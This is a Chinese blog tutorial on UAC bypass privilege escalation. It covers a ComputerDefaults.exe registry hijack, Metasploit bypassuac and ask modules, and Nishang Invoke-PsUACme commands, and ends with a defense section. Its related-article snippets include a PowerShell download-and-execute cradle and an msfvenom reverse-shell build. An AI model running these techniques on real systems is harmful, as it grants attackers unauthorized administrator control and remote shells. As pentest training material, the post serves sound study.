绕过UAC提权

最新推荐文章于 2024-05-21 13:08:04 发布
最新推荐文章于 2024-05-21 13:08:04 发布
阅读量7.8k 收藏 20
点赞数 2
分类专栏: 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36119192/article/details/104292591
版权

目录

UAC

如何Bypass UAC

MSF下实战利用

Nishang中的Invoke-PsUACme.ps1

针对绕过UAC提权的防御措施

UAC

UAC(User Account Control,用户账号控制)是微软为了提高系统安全性在Windows Vista中引入的技术。UAC要求用户在执行可能影响计算机运行的操作或在进行可能影响其他用户的设置之前,拥有相应的权限或者管理员密码。UAC在操作启动前对用户身份进行验证,以避免恶意软件和间谍软件在未经许可的情况下在计算机上进行安装操作或者对计算机设置进行更改。在Windows Vista及以后的版本中,微软设置了安全控制策略,分为高、中、低三个等级。高等级的进程有管理员权限;中等级的进程有普通用户权限;低等级的进程,权限是有限的,以保证系统在受到安全威胁时造成的损害最小。在权限不够的情况下,访问系统磁盘的根目录、Windows目录,以及读写系统登录数据库等操作,都需要经常UAC(User Account Control,用户账号控制)的认证。

需要UAC的授权才能进行的操作列表如下:

  • 配置Windows Update
  • 增加、删除账户
  • 更改账户类型
  • 更改UAC的设置
  • 安装ActiveX
  • 安装、卸载程序
  • 安装设备驱动程序
  • 将文件移动/复制到Program Files或Windows目录下
  • 查看其它用户的文件夹

UAC有如下四种设置要求:

  • 始终通知:这是最严格的设置,每当有程序需要使用高级别的权限时都会提示本地用户
  • 仅在程序试图更改我的计算机时通知我:这是UAC的默认设置。当本地Windows程序要使用高级别的权限时,不会通知用户。但是,当第三方程序要使用高级别的权限时,会提示本地用户
  • 仅在程序试图更改我的计算机时通知我(不降低桌面的亮度):与上一条设置的要求相同,但在提示用户时不降低桌面的亮度
  • 从不提示:当用户为系统管理员时,所有程序都会以最高权限运行

如何Bypass UAC

我们可以找一些以高权限运行的,但是并没有uac提示的进程,然后利用ProcessMonitor寻找他启动调用却缺失的如dll、注册表键值,然后我们添加对应的值达到bypass uac的效果。

以高权限运行的进程图标一般有如下标志:

我们win10以ComputerDefaults.exe作为bypass案例,ComputerDefaults.exe进程图标确实有个uac的标志(然后你双击打开会发现并没有uac提醒),

我们利用ProcessMonitor对该进程的行为做一个监听:

先寻找HKCU:\Software\Classes\ms-settings\Shell\Open\Command 注册表,然后发现键值不存在,再寻找HKCR:\ms-settings\Shell\Open\Command\DelegateExecute

因此当我们修改hkcu注册表后,运行ComputerDefaults.exe就会得到一个bypass uac后的cmd:

对了,当修改HKCU\Software\Classes\下的键值时,会同步修改HKCR下面的键值。

参考:https://mp.weixin.qq.com/s/OGiDm3IHBP3_g0AOIHGCKA

MSF下实战利用

Bypassuac提权的MSF模块

use exploit/windows/local/bypassuac  #该模块运行时会因为在目标机上创建多个文件而被杀毒软件识别,因此通过该模块提权成功率很低。
use exploit/windows/local/bypassuac_injection  #该模块直接运行在内存的反射DLL中,所以不会接触目标机器的硬盘,从而降低了被杀毒软件检测出来的概率。

MSF中Bypassuac模块的使用前提有两个:

  1. 一是系统当前用户必须在管理员组中,
  2. 二是用户账户控制程序UAC设置为默认,即 “仅在程序试图更改我的计算机时通知我” 。
use exploit/windows/local/bypassuac
set session 1
set lhost 0.0.0.0          
set lport 24444                #本地监听的端口,随便设置一个未被占用的端口即可
exploit

这里获取的test用户在管理员组中,且 UAC设置为默认,使用exploit/windows/local/bypassuac模块,攻击第二次成功!

这里获取的test用户在管理员组中,且 UAC设置为默认,使用use exploit/windows/local/bypassuac_injection模块,连续攻击两次都失败。提示32位的目标攻击64位的系统,但是我这里是使用的64为的target,也还是失败。

use exploit/windows/local/bypassuac_injection
set session 1
set target  1         #设置目标系统类型,1是64位,0是32位
set lhost 0.0.0.0
set lport 24444
exploit

Runas模块

使用 exploit/windows/local/ask 模块,需要使用 EXE::Custom 选项创建一个可执行文件(需要免杀),目标机器会运行一个发起提升权限请求的程序,提示用户是否要继续运行,如果用户选择继续运行程序,就会返回一个高权限的shell。

使用该模块的前提:

  • 当前用户必须在管理员组中 或 知道管理员的密码,对UAC的设置则没有要求。
  • 用户需要手动点击弹出的程序,是

Nishang中的Invoke-PsUACme.ps1

Invoke-PsUACme模块使用来自UACME项目的DLL绕过UAC。

Import-Module .\Invoke-PsUACme.ps1;Invoke-PsUACme -verbose  #使用sysprep方法并执行默认的payload
Import-Module .\Invoke-PsUACme.ps1;Invoke-PsUACme -method oobe -verbose  #使用oobe方法并执行默认的payload

针对绕过UAC提权的防御措施

在企业网络环境中,防止绕过UAC的最好方法是不让内网机器的使用者拥有本地管理员权限,从而降低系统遭受攻击的可能性。

使用本地管理员权限登录的用户,要将UAC设置为“始终通知”或者删除该用户的本地管理员权限(这样设置后,会像在Windows Vista中一样,总是弹出警告)。

参考文章:内网安全攻防:渗透测试实战指南

                  CVE-2019-1388:Windows UAC 本地提权


 

谢公子
关注
  • 2
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
UAC直接提权工具
03-10
UAC直接提权工具,支持win10,发出来的时候仍有效
域普通用户下安全允许的软件绕过UAC的办法
时节米的博客
08-14 7533
起因: 原来域组策略中测试设置了。 用户帐户控制: 以管理员批准模式运行所有管理员 已启用 用户帐户控制: 管理员批准模式中管理员的提升权限提示行为不提示,直接提升 测试多次,可以满足,公司所有软件正常运行。需安装软件、修改系统设置时会跳出输入凭证框。如图(注意看此图是需要输入用户名及密码的,跟下面的图有不同之处): 某天修改组策略,以允许域普通用户或以自行添加打印机及加载打印机驱动。修改完成后,然...
1433提权/绕过uac提权-零基础渗透自学路线
最新发布
程序员六七的博客
05-21 850
前言本文将介绍如何绕过KASLR以及如何提权利用。KASLR绕过可以利用操作加上组订阅可以泄露rule中的字段。该方法应该是可以用来泄露基地址的
windows提权总结
qq_44657899的博客
01-15 4033
文章目录0x01 使用ms16-032提权 0x01 使用ms16-032提权 exp地址: https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.8.12/Invoke-MS16-03
权限绕过/KASLR绕过提权利用(CVE-2023-35001)_0基础攻防指南
2401_84915584的博客
05-09 248
前言本文将介绍如何绕过KASLR以及如何提权利用。KASLR绕过可以利用操作加上组订阅可以泄露rule中的字段。该方法应该是可以用来泄露基地址的
低权限绕过UAC
qq_45300786的博客
12-19 674
先用msfvenom做一个码,上传到目标机,获得一个低权限的shell,然后getsystem,失败 目标机的管理员用户,那么接下来我就用这个y1用户登录 目标机的ip kali的ip 制作一个名为mantouka的后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.34 LPORT=6666 -f exe > mantouka.exe 用python开启一个简易的http服务 python3 -m http.se
UAC提权POC
04-08
本案例中的"过UAC提权POC"是一个针对UAC机制的漏洞利用代码,适用于Windows 7到Windows 8.1的操作系统。这意味着该POC能够绕过UAC的保护机制,使普通用户权限的程序得以提升至管理员权限。这种提权行为在恶意软件中...
UAC提权与降权、避免弹窗出现(源码)
08-11
UAC提权通常涉及到编程技术,如创建具有管理员权限的进程、利用API调用或特定的漏洞来绕过UAC提示。 2. **UAC降权** UAC降权则是指将具有管理员权限的账户切换到标准用户权限,以降低因误操作或恶意行为导致的安全...
UAC提权Oday
09-21
这种攻击手段通常涉及利用系统组件的弱点,或者误导用户批准恶意活动,从而绕过UAC的防护。 **长老漏洞演示及EXP源码** 提到“长老漏洞”,可能是指一个特定的UAC漏洞,但由于具体信息未提供,我们无法深入探讨该...
VB-UAC-BYPASS.rar_VB 提权_bypass uac_vb uac_提权_模拟CMD
09-22
"UAC提权"是这个过程的核心目标,即在UAC机制下提升当前进程的权限,通常这需要管理员级别的权限。"模拟弹出一个CMD欺骗"是实现这一目标的一种策略,通过伪装成系统的正常操作,诱使用户授权,从而在不知情的情况下...
Win7下绕过UAC代码
12-07
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM); void RefreshProcs(HWND hWnd); int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) { g_hInstance = hInstance; UNREFERENCED_PARAMETER(hPrevInstance); UNREFERENCED_PARAMETER(lpCmdLine); // Init base Windows services etc. { INITCOMMONCONTROLSEX icce = {0}; icce.dwSize = sizeof(icce); icce.dwICC = ICC_STANDARD_CLASSES; if (!InitCommonControlsEx(&icce)) { MessageBox(NULL, L"InitCommonControlsEx failed", L"Win7Elevate", MB_OK | MB_ICONERROR); return 0; }
WinPwnage:UAC绕过,提升,持久性方法
02-24
免责声明 提供此工具仅用于教育和研究目的。 该项目的作者对使用此工具概不负责。 建筑 此版本适用于Python> = 3.6,并将.exe文件放入dist目录。 使用pip命令安装pyinstaller: pip install pyinstaller 并运行以下命令: pyinstaller --onefile main.py 扫描 将内部版本号与“固定于”内部版本号进行比较并显示结果。 main.py --scan uac main.py --scan persist main.py --scan elevate 扫描可能的UAC方法时的示例结果 Id: Type: Compatible: Description: ---- ------ ----------- ------------- 1 U
程序过UAC方法
edger2heaven的专栏
02-05 964
假设程序在第一次运行时具有管理员权限。 一、暴力方法 1 UAC注册表位置 HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System  ConsentPromptBehaviorAdmin  0 EnableLUA 0 PromptOnSecureDesktop 0 2 改完后安全中心会报
window绕开UAC——利用UAC白名单程序提权
甜筒八部 的专栏
11-18 7657
Se在实际开发过程中,可以通过Process Explorer检查服务或程序处于哪个Session,会不会遇到Session 0 隔离问题。我们在Services 中找到之前加载的AlertService 服务,右键属性查看其Session 状态。
使用Metasploit绕过UAC的多种方法
weixin_30344995的博客
03-18 302
一、用户帐户控制(UAC)简介 在本文中,我们将简要介绍一下用户帐户控制,即UAC。我们还将研究它如何潜在地保护免受恶意软件的攻击并忽略UAC提示可能给系统带来的一些问题。 1.什么是用户帐户控制(UAC)? Microsoft的Windows Vista和Windows Server 2008操作系统引入了一种良好的用户帐户控制架构,以防止系统范围内的意外更改,这种更改是可以预见的,...
java虚拟机绕过_白名单绕过UAC方法原理介绍
weixin_42501688的博客
03-02 581
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。前言UAC(User AccountControl)是从Windows Vista开始出现的安全技术,它通过限制应用程序的执行权限来达到提升操作系统安全性的目的。在开启UAC的前提下,即使用户使用的是管理员账户登录,默认也只能获取标准权限,当用户某些动作可能会影响系统的安全及稳定性时...
关于父进程和子进程的关系(UAC 绕过思路)
weixin_34288121的博客
04-14 922
      表面上看。在windows中。假设是a进程创建了b进程,那么a进程就是b进程的父进程。反之,假设是b创建了a,那么b进程就是a的父进程,这是在windows出现以来一直是程序员们都证实的,可是在在win Vista后面有了一个新安全消息机制。UAC(user account control),这里科普下UAC的功能,事实上UAC就是大家常见的安装软件或者启动程序的时候的出现的全...
DccwBypassUAC - Windows 8.1和10 UAC绕过dccw exe中的WinSxS
我的学习笔记
02-28 875
参考:https://github.com/L3cr0f/DccwBypassUAC这种漏洞利用“WinSxS”由“dccw.exe”通过衍生Leo的Davidson“Bypass UAC”方法管理,以获得管理员shell而不提示同意。它支持“x86”和“x64”体系结构。此外,它已经在Windows 8.1 9600,Windows 10 14393,...
修改注册表绕过uac
10-13
通过修改注册表,可以在不关闭UAC的情况下单独取消一个程序的UAC提示框。具体操作如下:打开注册表编辑器,找到 HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers,添加需要绕过UAC的程序路径,然后在数值数据中添加 RUNASADMIN。这样就可以绕过UAC了。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

谢公子

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值